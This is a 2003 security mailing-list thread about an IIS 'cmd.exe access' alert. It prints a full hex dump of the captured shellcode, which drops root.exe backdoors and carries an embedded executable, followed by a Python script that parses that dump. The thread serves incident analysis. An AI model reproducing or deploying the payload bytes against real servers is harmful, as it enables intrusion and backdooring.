Security Incidents mailing list archives

RE: strange cmd.exe access


From: "MacDougall, Shane" <smacdougall () idanalytics com>
Date: Wed, 4 Jun 2003 21:22:03 -0700

We saw the exact same packets attack our network from 3 different hosts.
It appears that somehow this attack successfully breached a "hardened"
IIS box. URLScan reported typical Code Red-type traffic from the
attacking IPs, and although the IIS log was scrubbed of some suspicious
activity, our syslogs and IDS indicated that the attack was successful.

Any info on these attack packets would be greatly appreciated.

Regards.
Shane

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Shane MacDougall
Lead Security Officer
ID Analytics
San Diego, California USA
Direct: (858) 427-2860
Toll Free: 866-240-4484 x 2860
Fax: 858-427-2899
 

-----Original Message-----
From: Q [mailto:quentyn () the-q co uk] 
Sent: Thursday, May 29, 2003 12:10 PM
To: incidents () securityfocus com
Subject: strange cmd.exe access 

Hi, I saw this packet:

#(3 - 261684) [2003-05-09 19:43:00] [snort/1002]  WEB-IIS cmd.exe access
IPv4: 194.204.X.X -> X.X.X.X
      hlen=5 TOS=0 dlen=1472 ID=57174 flags=0 offset=0 TTL=116 chksum=60435
TCP:  port=27761 -> dport: 80  flags=***A**** seq=915915841
      ack=1210973630 off=5 res=0 win=17184 urp=0 chksum=16151
Payload:  length = 1432

000 : FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C   .u..U..E......Gl
010 : 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC   obalAddAtomA..u.
020 : FF 55 F8 89 45 D4 E8 0C 00 00 00 43 6C 6F 73 65   .U..E......Close
030 : 48 61 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 45 D0   Handle..u..U..E.
040 : E8 08 00 00 00 5F 6C 63 72 65 61 74 00 FF 75 FC   ....._lcreat..u.
050 : FF 55 F8 89 45 CC E8 08 00 00 00 5F 6C 77 72 69   .U..E......_lwri
060 : 74 65 00 FF 75 FC FF 55 F8 89 45 C8 E8 08 00 00   te..u..U..E.....
070 : 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 F8 89   ._lclose..u..U..
080 : 45 C4 E8 0E 00 00 00 47 65 74 53 79 73 74 65 6D   E......GetSystem
090 : 54 69 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 E8 0B   Time..u..U..E...
0a0 : 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 FF 55   ...WS2_32.DLL..U
0b0 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00   ..E......socket.
0c0 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C   .u..U..E......cl
0d0 : 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8   osesocket..u..U.
0e0 : 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63   .E......ioctlsoc
0f0 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00   ket..u..U..E....
100 : 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8   ..connect..u..U.
110 : 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF   .E......select..
120 : 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E   u..U..E......sen
130 : 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00   d..u..U..E......
140 : 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C   recv..u..U..E...
150 : 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF   ...gethostname..
160 : 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74   u..U..E......get
170 : 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55   hostbyname..u..U
180 : F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C   ..E......WSAGetL
190 : 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89   astError..u..U..
1a0 : 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C   E......USER32.DL
1b0 : 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69   L..U..E......Exi
1c0 : 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55   tWindowsEx..u..U
1d0 : F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89   ..E...E.i.....@.
1e0 : 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8   E....xV4........
1f0 : E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF   ....<.t.<.t.....
200 : FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC   ................
210 : FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF   ................
220 : FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF   ..... ..........
230 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF   ................
240 : FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7   .........Y...#..
250 : D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB   .#.X......t...
260 : E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 01 00   .t.;.X...t..h...
270 : 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE   ...\...P.U....\.
280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00   .......\CMD.EXE.
290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A   ^.....cj......d:
2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73   \inetpub\scripts
2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D   \root.exe...$...
2c0 : 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00   .\...P.U.j..+...
2d0 : 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D   d:\progra~1\comm
2e0 : 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44   on~1\system\MSAD
2f0 : 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19   C\root.exe...$..
300 : 8D 85 5C FE FF FF 50 FF 55 DC E8 BA 05 00 00 FC   ..\...P.U.......
310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00   MZP.............
320 : B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC   ........@.......
330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD   .......PE..L....
340 : 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B   *%).............
350 : 01 02 19 00 04 00 00 00 08 00 00 00 00 00 00 00   ................
360 : 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00   ........ ....@..
370 : 10 00 00 00 04 00 00 01 00 00 00 00 00 00 00 03   ................
380 : 00 0A 00 00 00 00 00 00 40 00 00 00 04 00 00 00   ........@.......
390 : 00 00 00 02 00 00 00 00 00 10 00 00 20 00 00 00   ............ ...
3a0 : 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00   ................
3b0 : 00 00 00 00 00 00 00 00 30 00 00 0C 01 FC FC FC   ........0.......
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10   ................
3e0 : 00 00 00 04 00 00 00 08 00 00 00 00 00 00 00 00   ................
3f0 : 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00   ...... ..`......
400 : 00 00 00 10 00 00 00 20 00 00 00 04 00 00 00 0C   ....... ........
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00   ..............@.
420 : 00 C0 00 00 00 00 00 00 00 00 00 10 00 00 00 30   ...............0
430 : 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00   ................
440 : 00 00 00 00 00 00 40 00 00 C0 FC FC FC FC FC FC   ......@.........
450 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC   ................
460 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC   ................
470 : FC FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00   ................
480 : 00 00 00 00 00 00 68 04 01 00 00 68 D0 20 40 00   ......h....h. @.
490 : E8 61 01 00 00 8D B8 D0 20 40 00 BE 00 20 40 00   .a...... @... @.
4a0 : A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 4C 01 00 00   ....j.h. @..L...
4b0 : E8 0C 00 00 00 68 C0 27 09 00 E8 31 01 00 00 EB   .....h.'...1....
4c0 : EF 68 D8 24 40 00 68 3F 00 0F 00 6A 00 68 10 20   .h.$@.h?...j.h. 
4d0 : 40 00 68 02 00 00 80 E8 32 01 00 00 0B C0 75 26   @.h.....2.....u&
4e0 : 6A 04 68 54 20 40 00 6A 04 6A 00 68 48 20 40 00   j.hT @.j.j.hH @.
4f0 : FF 35 D8 24 40 00 E8 0D 01 00 00 FF 35 D8 24 40   .5.$@.......5.$@
500 : 00 E8 0E 01 00 00 68 D8 24 40 00 68 3F 00 0F 00   ......h.$@.h?...
510 : 6A 00 68 58 20 40 00 68 02 00 00 80 E8 ED 00 00   j.hX @.h........
520 : 00 0B C0 75 55 BD 9C 20 40 00 E8 4C 00 00 00 BD   ...uU.. @..L....
530 : A8 20 40 00 E8 42 00 00 00 6A 09 68 B8 20 40 00   . @..B...j.h. @.
540 : 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 24 40 00 E8   j.j.h. @..5.$@..
550 : B4 00 00 00 6A 09 68 C4 20 40 00 6A 01 6A 00 68   ....j.h. @.j.j.h
560 : B4 20 40 00 FF 35 D8 24 40 00 E8 99 00 00 00 FF   . @..5.$@.......
570 : 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 05 D0 24 40   5.$@..........$@
580 : 00 00 04 00 00 68 D0 24 40 00 68 D0 20 40 00 68   .....h.$@.h. @.h
590 : D4 24 40 00 6A 00 55 FF                           .$@.j.U.

What is strange is that the cmd.exe / root.exe stuff is halfway through,
with some other code before it.

The IP it hit was not mapped to anything (I believe it is unused), so this
cannot have been part of another TCP conversation.


Any ideas?


--
There should be a sig here, but it got bored and wandered off
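The "other code before it" in the dump can be carved mechanically. What follows is an added example written for this archive page, not code from either poster. It re-assembles the hex dump by its offset column, walks the shellcode's call-over-string import resolver (each `E8 <len> 00 00 00 <name> 00` is a CALL that pushes the address of the string and jumps past it, leaving the name on the stack as the argument for the `FF 55 xx` call to GetProcAddress or LoadLibraryA that follows), lists the NUL-terminated file paths, and locates the MZ and PE signatures of the executable that starts at offset 0x310. The DUMP constant is an excerpt copied from the post (offsets 000-0d0, 1a0-1c0, 280-2f0, 310 and 330-340), with the gaps left in on purpose to exercise the offset handling; the placeholder module name for the entries before WS2_32.DLL is an assumption, since the capture begins mid-resolver. The root.exe copies under scripts\ and MSADC\ are the backdoor Code Red II left behind. The e_lfanew check shows the appended image is not stored as a loader-ready PE (the DOS header's pointer does not land on the PE signature 0x27 bytes later), so the script reports the signature offsets and stops rather than guessing at the encoding.

```python
"""Carve the import resolver, drop paths and embedded PE signatures out of
the payload dump posted above.  Added example for this thread, not code from
either poster.  DUMP is an excerpt copied from the post; the gaps between
regions are deliberate, to show bytes are placed by offset, not line order."""
import re
import struct

DUMP = r"""
000 : FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C   .u..U..E......Gl
010 : 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC   obalAddAtomA..u.
020 : FF 55 F8 89 45 D4 E8 0C 00 00 00 43 6C 6F 73 65   .U..E......Close
030 : 48 61 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 45 D0   Handle..u..U..E.
040 : E8 08 00 00 00 5F 6C 63 72 65 61 74 00 FF 75 FC   ....._lcreat..u.
050 : FF 55 F8 89 45 CC E8 08 00 00 00 5F 6C 77 72 69   .U..E......_lwri
060 : 74 65 00 FF 75 FC FF 55 F8 89 45 C8 E8 08 00 00   te..u..U..E.....
070 : 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 F8 89   ._lclose..u..U..
080 : 45 C4 E8 0E 00 00 00 47 65 74 53 79 73 74 65 6D   E......GetSystem
090 : 54 69 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 E8 0B   Time..u..U..E...
0a0 : 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 FF 55   ...WS2_32.DLL..U
0b0 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00   ..E......socket.
0c0 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C   .u..U..E......cl
0d0 : 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8   osesocket..u..U.
1a0 : 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C   E......USER32.DL
1b0 : 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69   L..U..E......Exi
1c0 : 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55   tWindowsEx..u..U
280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00   .......\CMD.EXE.
290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A   ^.....cj......d:
2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73   \inetpub\scripts
2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D   \root.exe...$...
2c0 : 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00   .\...P.U.j..+...
2d0 : 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D   d:\progra~1\comm
2e0 : 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44   on~1\system\MSAD
2f0 : 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19   C\root.exe...$..
310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00   MZP.............
330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD   .......PE..L....
340 : 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B   *%).............
"""

LINE_RE = re.compile(r"^\s*([0-9A-Fa-f]+)\s*:\s*(.*)$")

def parse_dump(text):
    """Rebuild the payload from '<offset> : <16 hex bytes>   <ascii>' lines.
    Bytes land at the offset in the first column, so a partial paste with
    gaps still lines up; bytes nobody pasted are zero-filled."""
    buf = bytearray()
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        off = int(m.group(1), 16)
        chunk = bytes.fromhex(m.group(2)[:16 * 3])  # 16 x "XX " precede the ascii column
        buf.extend(b"\x00" * max(0, off + len(chunk) - len(buf)))
        buf[off:off + len(chunk)] = chunk
    return bytes(buf)

# One resolver entry: E8 <len> 00 00 00 <name> 00.  The CALL pushes the address
# of <name> and jumps over it, so the string is already on the stack as the
# lpProcName argument when the FF 55 xx (call [ebp-xx]) after it executes.
ENTRY_RE = re.compile(rb"\xe8(.)\x00\x00\x00([A-Za-z0-9_.]+)\x00", re.DOTALL)

def walk_resolver(data):
    """Group resolved API names by the module they are looked up in.  A name
    ending in .DLL is a LoadLibraryA target; the names after it are
    GetProcAddress lookups against that module."""
    imports = {}
    module = "<module loaded before the capture starts>"  # assumption: capture is mid-resolver
    for m in ENTRY_RE.finditer(data):
        name = m.group(2).decode()
        if m.group(1)[0] != len(name) + 1:  # length byte must cover name + NUL
            continue
        if name.upper().endswith(".DLL"):
            module = name
            imports.setdefault(module, [])
        else:
            imports.setdefault(module, []).append(name)
    return imports

STRING_RE = re.compile(rb"[\x20-\x7e]{6,}")

def drop_paths(data):
    """Printable runs of 6+ bytes that contain a backslash: the file paths."""
    return [s.decode() for s in STRING_RE.findall(data) if b"\\" in s]

def embedded_image(data):
    """Find an MZ header and the PE signature after it, and check whether the
    DOS header's e_lfanew really points at that signature."""
    mz = data.find(b"MZ")
    pe = data.find(b"PE\x00\x00", mz) if mz >= 0 else -1
    if pe < 0 or len(data) < mz + 0x40:
        return {}
    e_lfanew = struct.unpack_from("<I", data, mz + 0x3C)[0]
    return {"mz_offset": mz, "pe_offset": pe, "e_lfanew": e_lfanew,
            "e_lfanew_points_at_pe": mz + e_lfanew == pe,
            "machine": struct.unpack_from("<H", data, pe + 4)[0],  # 0x14C = i386
            "sections": struct.unpack_from("<H", data, pe + 6)[0]}

def analyse(text):
    data = parse_dump(text)
    return {"imports": walk_resolver(data), "paths": drop_paths(data),
            "image": embedded_image(data)}

if __name__ == "__main__":
    import json
    print(json.dumps(analyse(DUMP), indent=2))
```

Paste the whole dump from the post into DUMP to get the complete import list; the `ioctlsocket` through `WSAGetLastError` entries fall in the region omitted here. The length-byte check in `walk_resolver` is what keeps the `E8 09 00 00 00 \CMD.EXE` and `E8 1C 00 00 00 d:\...` calls (which skip over path strings the same way) out of the import list.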

